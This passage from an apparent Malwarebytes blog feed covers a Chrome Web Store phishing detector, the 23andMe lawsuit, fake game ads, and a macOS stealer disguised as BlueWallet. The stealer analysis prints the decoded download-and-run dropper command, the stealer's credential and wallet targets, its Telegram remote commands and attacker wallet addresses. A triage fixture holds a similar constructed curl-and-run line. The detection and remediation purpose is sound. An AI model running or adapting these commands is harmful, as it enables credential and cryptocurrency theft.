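        self.displayed.extend(a[k] for k in DISPLAY_ATTRS if a.get(k))

    def handle_data(self, data):
        self.displayed.append(data)


def analyze_page(page_host: str, html: str) -> list:
    """Return (code, detail) findings for a page served from page_host."""
    p = PageCollector()
    p.feed(html)
    text = " ".join(p.displayed)
    findings = []
    shown_hosts = {m.group(1).lower() for m in HOST_RE.finditer(text)}
    for host in sorted(shown_hosts & TRUSTED_LOGIN_HOSTS):
        if registrable(host) != registrable(page_host):
            findings.append(("spoofed_login_host",
                             f"{host} is painted on the page but the real origin is {page_host}"))
    trusted_domains = {registrable(h) for h in TRUSTED_LOGIN_HOSTS}
    if p.has_password and registrable(page_host) not in trusted_domains:
        for action in p.form_actions:
            target = urlsplit(action).hostname or page_host
            if registrable(target) == registrable(page_host):
                findings.append(("credential_form_to_page_host",
                                 f"password form posts to {target}"))
    if re.search(r"setInterval\s*\(|time remaining|expires in", text, re.I):
        findings.append(("countdown_timer", "page runs a countdown to rush the victim"))
    return findings


# Constructed page mimicking the technique: fake title bar with padlock glyph and
# in-page "address", countdown, password form posting back to the scam host.
SCAM_HTML = """
<html><head><title>Chrome Web Store Developer Policy Center</title></head><body>
<div class="notice">Complaint #DMCA-48271. Time remaining: <span id="clock">47:59:12</span></div>
<div class="fake-window" draggable="true">
  <div class="titlebar">&#128274; accounts.google.com/signin</div>
  <form method="post" action="/collect.php">
    <input name="identifier" placeholder="Email or phone">
    <input type="password" name="password">
    <button>Continue to verification</button>
  </form>
</div>
<script>setInterval(function(){ tick(); }, 1000);</script>
</body></html>
"""

# Constructed control: a password form served by the real login host itself.
GENUINE_HTML = """
<html><body><form method="post" action="/signin/v2/challenge">
<input type="password" name="password"><button>Next</button></form></body></html>
"""


def finding_codes(page_host: str, html: str) -> list:
    return [code for code, _ in analyze_page(page_host, html)]


if __name__ == "__main__":
    for code, detail in analyze_page("dmca-chrome-extensions.click", SCAM_HTML):
        print(code, "-", detail)
```

The hostname check deliberately reads only displayed text and display attributes, not href targets: a real link to accounts.google.com is fine, while the string accounts.google.com drawn inside a div is the fake address bar. The page host passed in must come from where the capture was actually fetched, which is the same information the real address bar gives the victim.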

How to stay safe

The good news is that a few simple habits defeat this scam.

  • Don’t trust the link. If you receive a warning about your extension, go directly to your Chrome Web Store developer dashboard and check there.
  • Be suspicious of urgency. Legitimate policy processes don’t rely on countdown clocks to force immediate action.
  • Check the address bar. A real Google sign-in page appears at accounts.google.com in your browser’s actual address bar.
  • Test the window. If a sign-in window can’t be dragged outside the browser or disappears when the browser is minimized, it’s probably fake.
  • Turn on stronger sign-in protection. Passkeys and hardware security keys make stolen passwords far less useful to attackers.
  • Use security software with phishing and web protection. Our Browser Guard, which is also part of Malwarebytes Premium, can help block malicious websites and phishing pages before you enter sensitive information.

This isn’t a crude phishing page. It uses your real extension details, mimics Google’s branding, and creates a convincing sense of urgency.

If you receive a warning about your extension, don’t follow the link and don’t race the countdown. Go directly to your Chrome Web Store developer dashboard and verify the claim there.

When in doubt, close the tab.

If you already entered your details

Act quickly.

  • Change your Google password immediately from a trusted device.
  • Sign out of all active sessions in your Google account security settings.
  • Review connected apps and devices for anything unfamiliar.
  • Turn on two-step verification, preferably using a passkey or security key.
  • Check your Chrome Web Store listings for changes, uploads, or new versions you didn’t publish.

Indicators of Compromise (IOCs)

Domain

dmca-chrome-extensions[.]click


23andMe exposed genetic information of millions, lawsuit says

Malware Bytes Security - Tue, 06/02/2026 - 5:53am

California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.

On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.

California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.

The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.

The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.

The victim-blaming defense became evidence

After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared by users of their own free will and would not cause “pecuniary harm.”

The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.

The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.

In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.

Can the state recover damages?

California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.

The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.

Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.

Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.

What customers can do

If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.

Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Categories: Malware Bytes

Fake virus alerts are invading mobile games

Malware Bytes Security - Tue, 06/02/2026 - 5:03am

Sometimes it happens. You’re happily playing a game on your phone or laptop when suddenly alarms pop up out of nowhere:

“Your device is infected!”

“Your iCloud is full!”

“Your account is restricted for watching porn!”

Some games can be played for free if you agree to watch ads, and in others you can get extra lives, perks, or boosters by watching ads. That’s fine, as long as you’re given a choice and the ads are legitimate.

Unfortunately, cybercriminals sometimes manage to buy advertising space and use it to defraud gamers.

Let’s look at some examples.

The iCloud storage scam, or its OneDrive equivalent, is a well-known and long-running scam that claims you need to expand your storage or all your files will be deleted. The websites these messages link to come in many forms, but they all ask for personal and payment details to complete the upgrade.

“Your account has been restricted.
We have detected that your device has been hacked after visiting adult websites.
Solution:
1:Click the “OK” button below;

2:You will be redirected to App Store;

3:Install and open the app, then run the cleanup program.”

This ad is a scam and uses a classic scare tactic. It falsely claims your device has been hacked and tries to pressure you into clicking “OK” and installing a cleanup app.

Messages like this sometimes claim to be from your ISP, a “Security Department,” or a generic “Safety Center.”

“Apple Security Alert
8 viruses have been detected on your iPhone. Now iOS is damaged by 72%. Further damage to the system will result in device lockup and loss of all data within two minutes.
Please click the button below to remove all viruses.”

This is another fake warning, commonly used by scammers to trick users into clicking links or downloading unnecessary or harmful software. Apple doesn’t send alerts like this, and these messages use vague threats to get your attention.

What kind of app you’re really installing if you follow the instructions depends on your device and your location. If you’re “lucky,” it’s just adware, but you might just as easily end up with an infostealer.

In many cases, you’ll end up with fleeceware, a type of deceptive mobile app where developers lure users in with short free trials that quickly convert into hidden subscription fees, sometimes costing hundreds of dollars per month. These apps often offer some functionality to stay on the barely legal side of things, but at wildly inflated prices.

How to stay safe

The best response to these messages is simply to ignore them.

Real system alerts come from the OS, not from inside a game window or browser tab. Here’s a simple test: If you can switch apps and the “warning” disappears with the browser/game, it was not a system‑level alert.

Check the destination URLs before proceeding. Apple, Google, and major ISPs use predictable domains. A familiar-looking URL is not proof that a message is legitimate, but if the URL looks suspicious, it should definitely be treated as a scam.


You may arrive at something that looks like the official App Store or Google Play Store. Be wary of lookalike app stores and unofficial download sites, but if you are on the real store, the app is generally safer to install. However, it’s still worth checking reviews, permissions, and the developer before proceeding.

Visit the official website of the organization the message claims to be from and log in there. If there’s a genuine problem with your account, storage, or device, you’ll find information about it through official channels.

Use an up-to-date, real-time anti-malware solution on your devices that can detect and block malicious apps.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Categories: Malware Bytes

Fake BlueWallet steals passwords, accounts, and crypto from Macs

Malware Bytes Security - Mon, 06/01/2026 - 10:40am

A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.

If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses.

That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.

Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.

If you did run it, treat the machine as compromised and follow the steps below.

What to do if you may have run it

If you opened the file and pressed play, assume your device was compromised and work through these steps:

  • Disconnect the machine from the network to cut the control channel
  • Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled
  • From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges
  • Move any cryptocurrency to a new wallet created on a clean device
  • Treat existing seed phrases and keys as exposed
  • Before sending crypto in future, verify the full destination address character by character
  • Check for and remove unfamiliar files in ~/Library/LaunchAgents
  • Look for a hidden .sysupd.sh file in /tmp
  • Rotate cloud and SSH credentials if .ssh, .aws, or .gnupg files were present on the machine
  • When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place

Social engineering tricks

The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.

The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.

As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.

That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”

In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.

Technical analysis

Stage one: The AppleScript downloader

The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.

The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.

Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.

On modern macOS, an unsigned application downloaded from the web carries a quarantine flag and is checked by Gatekeeper before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow: the script file is just text, and the code that runs it is Apple’s own signed tool. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.

This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.

The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.

The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.

Stage two: Payload analysis

The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.

Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.

That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.
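As an added example (not code from the sample or from the original analysis), the following Python reimplements that _xd scheme and shows why the obfuscation is only a speed bump: the same routine decodes every field, and a known plaintext prefix such as https:// hands the key straight back. The encoded configuration values below are constructed placeholders, not the sample’s real token, chat ID or URL.

```python
"""Reimplementation of the payload's _xd-style config obfuscation (added example).

The malware stores its Telegram token, chat ID and staging URL as hex strings
XORed with the repeating key swckR9JCD2Uu. Because both the key and the
algorithm sit in the script, every value is recoverable. This module decodes
such strings and shows how the key itself falls out of a ciphertext whose
plaintext prefix is predictable (e.g. "https://").
All encoded sample values below are constructed placeholders, not real ones.
"""
from typing import List, Optional

KEY = b"swckR9JCD2Uu"  # repeating XOR key quoted in the analysis


def xor_decode_hex(hex_str: str, key: bytes = KEY) -> str:
    """Walk the hex string two characters at a time and XOR each byte with
    the key byte at the same position modulo the key length."""
    data = bytes.fromhex(hex_str)
    plain = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return plain.decode("utf-8", errors="replace")


def xor_encode_hex(plain: str, key: bytes = KEY) -> str:
    """Inverse of xor_decode_hex; XOR is symmetric, only the hex framing differs."""
    data = plain.encode("utf-8")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()


def recover_key(hex_str: str, known_prefix: str, key_len: int = len(KEY)) -> List[Optional[int]]:
    """Known-plaintext attack: if the decoded value is known to start with
    known_prefix, ct[i] ^ pt[i] yields key[i % key_len]. Key positions the
    prefix does not reach are returned as None."""
    ct = bytes.fromhex(hex_str)
    pt = known_prefix.encode("utf-8")
    key: List[Optional[int]] = [None] * key_len
    for i in range(min(len(ct), len(pt))):
        key[i % key_len] = ct[i] ^ pt[i]
    return key


# Constructed stand-ins for the four obfuscated fields (not the sample's values).
CONSTRUCTED_CONFIG = {
    "bot_token": xor_encode_hex("0000000000:CONSTRUCTED_BOT_TOKEN_PLACEHOLDER"),
    "chat_id": xor_encode_hex("-1000000000000"),
    "cmd_token": xor_encode_hex("0000000000:CONSTRUCTED_CMD_TOKEN_PLACEHOLDER"),
    "stage_url": xor_encode_hex("https://example.invalid/serve_site/constructed.sh"),
}


def decode_config(encoded: dict) -> dict:
    """Decode every obfuscated field with the shared key, as the payload does at runtime."""
    return {name: xor_decode_hex(hexval) for name, hexval in encoded.items()}


if __name__ == "__main__":
    for name, value in decode_config(CONSTRUCTED_CONFIG).items():
        print(f"{name:10s} {value}")
    # A known prefix at least as long as the key recovers every key byte.
    recovered = recover_key(CONSTRUCTED_CONFIG["stage_url"], "https://example.invalid/")
    print(bytes(b for b in recovered if b is not None))
```

The point of recover_key is that an analyst does not even need to read the decoder: the staging URL must start with https://, so eight of the twelve key bytes come from the ciphertext alone, and any longer guessable prefix yields the rest.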

One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.

Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.

What the malware steals

The second stage’s collection routines are sweeping. They pull from six broad categories.

1. Web browsers

The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:

  • Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex
  • Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf
  • macOS native browser data: Safari cookies, history, and form values
2. Cryptocurrency wallets

This appears to be the script’s primary focus.

It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

It also targets browser-extension wallets across several ecosystems:

  • Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz
  • Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope
  • EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI
  • Cosmos: Keplr, Station, and Cosmostation
  • Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple
3. Password managers and security tools

The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.

It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

4. Communication and social apps

The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.

5. Developer and cloud tools

It looks for credentials and configuration files in the user’s home directory, including:

  • AWS CLI configurations in .aws
  • SSH keys in .ssh
  • GnuPG keys in .gnupg
  • Kubernetes configs in .kube
  • Shell and Git files including .zshrc, .zsh_history, .bash_history, and .gitconfig
6. Productivity apps and general files

The script copies the local Apple Notes database, NoteStore.sqlite.

It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.

What it does with the stolen data

The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . -authonly before saving it, so it only stops prompting once it has a working credential.

For exfiltration, it archives the staged data with macOS’s own ditto, a native tool that is always present, so nothing extra has to be fetched. To stay under Telegram’s 50 MB upload limit for bots, it breaks larger archives into 49 MB chunks with split before sending each part.

It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.

The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.

That means the substitution happens silently between copy and paste.
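To make the hijack concrete, here is an added example in Python (not from the sample or from Malwarebytes) that mirrors the same three address regexes from the defender’s side: it classifies clipboard text as a Bitcoin, Ethereum or Solana address and flags the signature the loop leaves behind, an address replaced by a different address of the same chain, or by one of the attacker addresses listed in the IOCs. It matches by shape only and performs no checksum validation; the user address in the demo is constructed.

```python
"""Clipboard-swap detector (added example, not from the sample or Malwarebytes).

The implant's clip_watch loop regex-matches Bitcoin, Ethereum and Solana
addresses on the clipboard and overwrites them with attacker addresses via
pbcopy. This mirrors that matching from the defender's side: given the text a
user copied and the text later found on the clipboard, flag a swap (same chain,
different address) and recognise the addresses published as IOCs.
Assumption: address formats are validated by shape only, no checksums.
"""
import re
from typing import Optional

# Order matters: a legacy "1..." Bitcoin address is also valid base58 of
# Solana-like length, so Bitcoin is tested before Solana.
ADDRESS_PATTERNS = [
    ("eth", re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("btc", re.compile(r"^(bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$")),
    ("sol", re.compile(r"^[1-9A-HJ-NP-Za-km-z]{32,44}$")),
]

# Attacker addresses from the IOC list in this analysis.
KNOWN_HIJACK_ADDRESSES = {
    "bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e": "btc",
    "0x2B871703122064e45d77146a6D5203da3bD192FA": "eth",
    "8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v": "sol",
}


def classify_address(text: str) -> Optional[str]:
    """Return 'btc', 'eth' or 'sol' if text looks like an address of that chain."""
    candidate = text.strip()
    for chain, pattern in ADDRESS_PATTERNS:
        if pattern.match(candidate):
            return chain
    return None


def detect_swap(copied: str, clipboard_now: str) -> Optional[str]:
    """Compare what the user copied with what is about to be pasted.
    Returns a human-readable alert, or None when nothing looks wrong."""
    if copied.strip() == clipboard_now.strip():
        return None
    before, after = classify_address(copied), classify_address(clipboard_now)
    if after and clipboard_now.strip() in KNOWN_HIJACK_ADDRESSES:
        return f"clipboard now holds a known attacker {after} address"
    if before and before == after:
        return f"{before} address replaced between copy and paste"
    return None


if __name__ == "__main__":
    # Constructed user address (not a real wallet); simulate the hijack.
    user_btc = "bc1q" + "x" * 38
    print(detect_swap(user_btc, user_btc))
    print(detect_swap(user_btc, "bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e"))
```

On a live Mac the two inputs would come from the paste target and from pbpaste; the useful observation is that a legitimate copy never changes chain type or value on its own, so “same chain, different string” is the whole signal.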

Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:

  • /info for system details
  • /exec for arbitrary shell commands
  • /clipboard to read current clipboard contents
  • /download to pull specific files
  • /exfil to rerun the theft module
  • /selfdestruct to wipe traces

This makes the Telegram channel a real-time remote-control link, not just a one-way drop.

Living off the land, and off Telegram

The pattern here is familiar and getting more common: lean on tools that are already trusted.

The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.

None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.

Detection opportunities

The lessons here are less about the lure and more about the technique itself.

Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.

Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.
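The remediation list earlier in this article (LaunchAgents, the hidden /tmp/.sysupd.sh) and the detection points above can be checked with a short triage script. The following Python is an added example, not a Malwarebytes tool: it looks for the hidden dropper, for LaunchAgent plists whose program lives in a hidden or temporary directory, and for downloaded .applescript files that pipe base64 into a shell, decoding the command they would run. Paths are parameters so it can be pointed at a mounted volume; the demo runs against a constructed fixture built in a temporary directory rather than the live machine, and the plist labels and commands in that fixture are invented.

```python
"""Host triage for the artifacts described above (added example, not a
Malwarebytes tool). Checks the three on-disk traces the analysis names:
a hidden /tmp/.sysupd.sh, LaunchAgent plists pointing at hidden or temp
paths, and .applescript downloads that wrap a base64 shell command.
All paths are parameters so the checks can run against a mounted image;
run_demo() builds a constructed fixture instead of touching the live system.
"""
import base64
import os
import plistlib
import re
import tempfile

# "do shell script" followed by echo <base64> | base64 -d, as in the stage-one file.
B64_SHELL_RE = re.compile(
    r"do shell script.*?echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode|-D)",
    re.S,
)


def check_tmp_dropper(tmp_dir: str) -> list:
    path = os.path.join(tmp_dir, ".sysupd.sh")
    return [("tmp_dropper", path)] if os.path.isfile(path) else []


def check_launch_agents(launch_agents_dir: str) -> list:
    """Flag plists whose ProgramArguments run something from a hidden
    directory or from /tmp; the analyst should still review every entry."""
    findings = []
    if not os.path.isdir(launch_agents_dir):
        return findings
    for name in os.listdir(launch_agents_dir):
        if not name.endswith(".plist"):
            continue
        full = os.path.join(launch_agents_dir, name)
        try:
            with open(full, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception:
            findings.append(("unparseable_plist", full))
            continue
        args = plist.get("ProgramArguments") or [plist.get("Program", "")]
        program = " ".join(str(a) for a in args)
        if program.startswith("/tmp/") or any(part.startswith(".") for part in program.split("/")):
            findings.append(("suspicious_launch_agent", f"{full} -> {program}"))
    return findings


def check_applescript_downloads(downloads_dir: str) -> list:
    """Find .applescript files that pipe base64 into a shell and decode the payload."""
    findings = []
    if not os.path.isdir(downloads_dir):
        return findings
    for name in os.listdir(downloads_dir):
        if not name.lower().endswith(".applescript"):
            continue
        full = os.path.join(downloads_dir, name)
        with open(full, "r", errors="replace") as fh:
            text = fh.read()
        m = B64_SHELL_RE.search(text)
        if m:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
            findings.append(("base64_applescript", f"{full} -> {decoded}"))
    return findings


def triage(home: str, tmp_dir: str) -> list:
    return (check_tmp_dropper(tmp_dir)
            + check_launch_agents(os.path.join(home, "Library", "LaunchAgents"))
            + check_applescript_downloads(os.path.join(home, "Downloads")))


def run_demo() -> list:
    """Build a constructed fixture and triage it. Nothing here is the real payload."""
    with tempfile.TemporaryDirectory() as root:
        home, tmp_dir = os.path.join(root, "home"), os.path.join(root, "tmp")
        agents = os.path.join(home, "Library", "LaunchAgents")
        os.makedirs(agents)
        os.makedirs(os.path.join(home, "Downloads"))
        os.makedirs(tmp_dir)
        open(os.path.join(tmp_dir, ".sysupd.sh"), "w").close()
        with open(os.path.join(agents, "com.constructed.sample.plist"), "wb") as fh:  # hidden support dir
            plistlib.dump({"Label": "com.constructed.sample", "RunAtLoad": True,
                           "ProgramArguments": [os.path.join(home, ".hidden_support", "agent.sh")]}, fh)
        with open(os.path.join(agents, "com.vendor.updater.plist"), "wb") as fh:  # benign control
            plistlib.dump({"Label": "com.vendor.updater",
                           "ProgramArguments": ["/Applications/Vendor.app/Contents/MacOS/updater"]}, fh)
        fake_cmd = "curl -s 'https://example.invalid/stage2.sh' -o /tmp/.x.sh && /tmp/.x.sh"  # constructed
        b64 = base64.b64encode(fake_cmd.encode()).decode()
        with open(os.path.join(home, "Downloads", "Sample Installer.applescript"), "w") as fh:
            fh.write(f'do shell script "echo {b64} | base64 -d | sh"\n')
        return triage(home, tmp_dir)


if __name__ == "__main__":
    for kind, detail in run_demo():
        print(kind, detail)
```

Against a real machine you would call triage(os.path.expanduser("~"), "/tmp"); the decode step matters because the stage-one file is disposable, so recovering the curl target from a quarantined download is often the only way to get the second-stage URL after the page has gone.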

Indicators of Compromise

File hashes (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Network indicators

  • update-bluewallet[.]com
  • projects2026box[.]com

Clipboard-hijack addresses

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Your phone called. It needs a cleanup.

Malware Bytes Security - Mon, 06/01/2026 - 4:31am

Does it sometimes take your phone a few minutes to accomplish one simple task? That can be wildly frustrating.

But you’re in luck, because we’ve got a free tool that scans your phone for leftover files, temporary data, outdated caches and helps you clean up all that junk.

Introducing our Android Junk Cleaner. The new, free feature in our app clears out your unused files, helps protect your privacy, frees up valuable storage space, and improves your device’s performance. 

Start cleaning up your phone now. Download the app and clear out your junk.

How to clean up your Android device

1. Open the Malwarebytes app on your Android device

2. On the Junk Cleaner card, tap Clean

If this is your first time using Junk Cleaner, you’ll need to grant permissions:

  • Allow file access: Tap Give permission, then turn on Allow Malwarebytes to manage all files.
  • Allow usage access: Tap Go to Settings. Under App usage data, tap Malwarebytes, then turn on Permit access to app usage data. If the toggle is grayed out, follow the on-screen instructions to enable access.

3. Return to the Junk Cleaner screen and tap Refresh

4. Tap Select all, then Clean all

Once the cleanup is complete, you’ll see an “All clean” screen showing how much storage space you freed up.

Prefer to remove files individually? Just select the files or folders you want to delete, then tap Clean.

Important: Once files are deleted with Junk Cleaner, they cannot be recovered using the Malwarebytes app.

Get started

Download Malwarebytes for Android and start cleaning up your device today.

Not a Malwarebytes user yet? No problem, it’s never too late to start. Whether you’re looking for yourself, your family, or a small business, we have a range of plans to choose from.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review

Categories: Malware Bytes

Payment apps are watching what you say (Lock and Code S07E11)

Malware Bytes Security - Sun, 05/31/2026 - 9:52pm

This week on the Lock and Code podcast…

In the United States today, you can have your bank account closed, your credit cards cancelled, and your online payments revoked for any number of crimes, like funding terrorism, engaging in money laundering, or violating sanctions.

Sensible, right? Well, you can also face financial ruin for teaching poetry.

